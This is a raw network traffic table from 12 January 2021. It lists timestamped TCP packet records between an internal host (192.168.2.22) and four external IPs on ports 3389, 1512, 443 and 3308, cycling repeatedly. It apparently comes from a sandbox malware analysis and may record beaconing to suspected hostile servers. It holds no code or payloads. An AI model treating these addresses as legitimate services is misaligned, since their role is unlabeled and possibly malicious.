Jan 12, 2021 07:45:22.600553989 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.600815058 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.602750063 CET	49370	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:22.656552076 CET	3389	49370	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:22.714112043 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.767241001 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:22.767364025 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.768954992 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.821794987 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:22.828928947 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:22.828984022 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:22.829065084 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.829104900 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.841551065 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.895948887 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:22.896075010 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.906137943 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.906511068 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.959528923 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:22.959820032 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:22.997879982 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:23.012906075 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:23.110342026 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:23.110389948 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:23.110680103 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:23.116436958 CET	49371	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:23.169517040 CET	1512	49371	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:23.259130955 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.310874939 CET	443	49372	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:23.310995102 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.312843084 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.364397049 CET	443	49372	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:23.379292965 CET	443	49372	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:23.379400969 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.394032955 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.448139906 CET	443	49372	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:23.448415041 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.459228992 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.459644079 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.511238098 CET	443	49372	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:23.511511087 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.563160896 CET	443	49372	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:23.682706118 CET	443	49372	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:23.682754040 CET	443	49372	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:23.683017015 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.688807011 CET	49372	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:23.740607023 CET	443	49372	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:23.846726894 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:23.890044928 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:23.890167952 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:23.892215014 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:23.935754061 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:23.946645021 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:23.946703911 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:23.946764946 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:23.946809053 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:23.962524891 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:24.007577896 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:24.007802010 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:24.017134905 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:24.017374039 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:24.060544968 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:24.060719967 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:24.101114988 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:24.104024887 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:24.104065895 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:24.217641115 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:24.217696905 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:24.217921972 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:24.223624945 CET	49373	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:24.266972065 CET	3308	49373	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:24.384390116 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.439439058 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.439558983 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.441107035 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.495419979 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.534296989 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.534353018 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.534477949 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.534493923 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.548254013 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.611354113 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.611426115 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.616251945 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.616337061 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.674432993 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.674511909 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.714178085 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.730396986 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.730460882 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.820806026 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.820848942 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:24.820918083 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.820940971 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.823714972 CET	49374	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:24.878118992 CET	3389	49374	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:25.012506008 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.065823078 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.065988064 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.067528009 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.120582104 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.127739906 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.127758026 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.127862930 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.139765024 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.194137096 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.194458008 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.204957008 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.205307007 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.258480072 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.258800030 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.298259974 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.312071085 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.312134981 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.413181067 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.413233995 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.413678885 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.419480085 CET	49375	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:25.472835064 CET	1512	49375	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:25.533478022 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.587584972 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.588251114 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.589308023 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.641347885 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.655993938 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.656167984 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.665844917 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.720675945 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.720859051 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.726087093 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.726300001 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.778353930 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.778492928 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.814747095 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.830615044 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.830715895 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.948885918 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.948911905 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:25.949071884 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:25.954778910 CET	49376	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:26.006876945 CET	443	49376	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:26.062920094 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.106436014 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.106663942 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.108453035 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.151623011 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.164890051 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.164911032 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.164952993 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.178116083 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.222980976 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.223045111 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.228106976 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.228323936 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.271379948 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.271507025 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.311134100 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.314562082 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.314579964 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.428143978 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.428215027 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.428256989 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.428287029 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.431202888 CET	49377	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:26.474493980 CET	3308	49377	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:26.547233105 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.602019072 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.602087975 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.602842093 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.657315016 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.685547113 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.685614109 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.685681105 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.685739040 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.697712898 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.765284061 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.765568972 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.770590067 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.770668030 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.824815035 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.825028896 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.867760897 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.880256891 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.880323887 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.971019983 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.971091986 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:26.971128941 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.971165895 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:26.973277092 CET	49378	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:27.027590990 CET	3389	49378	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:27.076997042 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.129978895 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.130088091 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.130861044 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.183715105 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.190615892 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.190654039 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.190726042 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.190742970 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.207829952 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.263000965 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.263258934 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.269012928 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.269263983 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.322237015 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.322455883 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.362061024 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.375648022 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.375710964 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.473297119 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.473337889 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.473509073 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.476349115 CET	49379	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:27.529304981 CET	1512	49379	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:27.596975088 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:27.648931026 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:27.649055958 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:27.650594950 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:27.702222109 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:27.717139959 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:27.717295885 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:27.732661009 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:27.786705017 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:27.787062883 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:27.793998957 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:27.794307947 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:27.845901966 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:27.846251965 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:27.883042097 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:27.898319006 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:28.016954899 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:28.017004013 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:28.017211914 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:28.022917032 CET	49380	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:28.074582100 CET	443	49380	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:28.150666952 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.194195986 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.194328070 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.195796013 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.239087105 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.250041008 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.250128984 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.250159979 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.250205994 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.267666101 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.312844992 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.313024998 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.327985048 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.328142881 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.371366024 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.371695042 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.411931038 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.415031910 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.415076017 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.527905941 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.527956963 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.528254986 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.533956051 CET	49381	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:28.577156067 CET	3308	49381	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:28.642472982 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.697118044 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:28.697307110 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.698853970 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.753144979 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:28.776438951 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:28.776515007 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:28.776581049 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.776633024 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.781754017 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.841412067 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:28.841551065 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.845400095 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.845458031 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.899811983 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:28.900125027 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:28.939213991 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:28.954607010 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:28.954679012 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:29.045618057 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:29.045669079 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:29.045926094 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:29.135046005 CET	49382	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:29.189656019 CET	3389	49382	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:29.246284962 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.299416065 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.299499989 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.300101995 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.353019953 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.360070944 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.360133886 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.360146046 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.360179901 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.366283894 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.420521975 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.420742989 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.427061081 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.427264929 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.480010986 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.480488062 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.517900944 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.533549070 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.633516073 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.633567095 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.633728027 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.636450052 CET	49383	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:29.689372063 CET	1512	49383	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:29.750308990 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:29.802700996 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:29.805526018 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.122513056 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.239451885 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:30.254415989 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:30.256701946 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.269380093 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.324121952 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:30.324671030 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.334567070 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.335000038 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.387212038 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:30.389604092 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.442123890 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:30.442174911 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:30.561290979 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:30.561347961 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:30.561511993 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.592963934 CET	49384	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:30.645473003 CET	443	49384	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:30.699584007 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:30.743096113 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:30.743300915 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:30.745049953 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:30.788196087 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:30.799057007 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:30.799101114 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:30.799176931 CET	49385	3308	192.168.2.22	80.86.91.27
